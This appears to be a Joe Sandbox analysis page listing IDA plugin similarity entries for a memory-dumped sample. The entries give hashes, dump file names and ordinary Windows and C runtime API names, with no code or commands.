                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction ID: c7ca2951b58de854e9435c53d4e88286f2e3c369a0eeba24442f6d66f35b0a8a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0316E36608B8186DB60CF29EC452AE73A4FB987A8F540135EE9D83B94DF7CD159CB01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                                              • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                              • Instruction ID: b953d486e0e311c067662f3579c5b56241669748530832a6119eb82da4e9b82d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1B11A22B18A9641EF60DB29AC0A2B9A3A1EF54BF4F544131DD5D87BD5EF7CE441C302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction ID: 27bcf5ecab6bf9a5291cc3095efea6fbea17842a2d565b7d9bd1a9f0b23468ac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0112E26B14F058AEF00CF64EC592B933A4FB59768F440E31DA6D86BA4DF7CE1598341
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                              • Instruction ID: 0b215102b421fc4f5710fc1756740f8900df75f8b14ee2a39f8abeea05682102
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90C1F672B1928687EF24CF1AE4496AAB791F7A4B94F448135DB4E83748DF7DE801CB40
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                                              • Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                                                                                                              • Instruction ID: a244c0b694e058d3c9f71a2fa5305e939258bd4fd2ee60b86aae4a5f3bc8efec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4F19472A483D94FEBA58B16C888A3E3BADEF44750F054538DE49877A0CF39E581CB45
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                                              • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                              • Instruction ID: 679584e2b804aa13a57e160440ae30049d548f068a57df35ee2a2945ebd7d56c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81B13973A04B898AEB19CF2DC84A3687BE0F744B58F188921DA6D877A8CF7DD451C701
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                                              • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                              • Instruction ID: ca878c7daea9ae890c6dc2bd4280251ae670bc75a1ae5680274e3f032277987e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAE1A336A0C64685EF68CF29895A13933A0FF45B68F944136DE0EC77D4DF29E862C742
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                              • API String ID: 0-900081337
                                                                                                                                                                                                                                              • Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                                                                                                              • Instruction ID: ea573c718520db83f71b7638d812735d02fdd05f7036ca25c7847be40162ad58
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25919872A1C2C58FEBA58B15D858B3E3BA9FB44360F114139DE4A86790CF39E581CB46
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                                              • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                              • Instruction ID: caa3c82e0e49d2e9a0c26d4a443b2ce746d7f0796b9a7a48bc14665e214b8313
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85516D62B182C586EB258E36DC0A7697B91F744BA4F48C231CFA887AC5CF7ED451C702
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                                              • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                              • Instruction ID: 182afb3e7f43f3b26312460b09e3675bcac430ad2df945a192ce9a6127709aec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CA16862B087C946EF21DF25A8057AD7B91EB55BA4F048032DE8D877C5DE3EE411C702
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                              • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                              • Instruction ID: 1c7e2ed98b992bcf7e70954ece71b7cd3bcf458e971f87e6abe35e2a204d4476
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9519E11F0CA5241FE68AB265D1B17A52906F95BF4F589435DE0EC77D6EE3CE4328203
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                                              • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                              • Instruction ID: 297d6d3a41d468a6937034c2b0d2ace1f857ac7360e4079aee7e31cdb4ced89e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEB09220E07A02C2EE092B296C8B21822A57F98721F980138C40C81330DE6C20EA5706
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                              • Instruction ID: c747f7fd46de326956c03c0654647c31c828606aca7cde0a206ed988cb8f4dce
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2D1E662A0C64285EF688F29884A23D27A0FF05B78F944235CE0D877D5DF3DE966C742
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                              • Instruction ID: 96eb71dc82efb525b9d3322019c0be88b9c87763add80d9ae5992a2fde8bfaf7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92C1BE726181E08BD28AEB29E87947A73E1F78930DB95406BEF87477C5CB3CA414DB11
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                              • Instruction ID: dedb7368a5025a6db4c09e0c086cfae2487edcd9505ecef04e7b07440d47bc08
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1B16D7290878585EF698F39C85A23C3BA0F749B68F284136CE4E87395CF39D861D746
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                              • Instruction ID: a1f0538c87385d5a3ccd49334a22254e227ceceb8cc08856bd6cdb1b82465e09
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6681D572A287C186DF74CB1AA84A36A7A91FF457A4F144235DECD83B85DF3DE4208B01
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
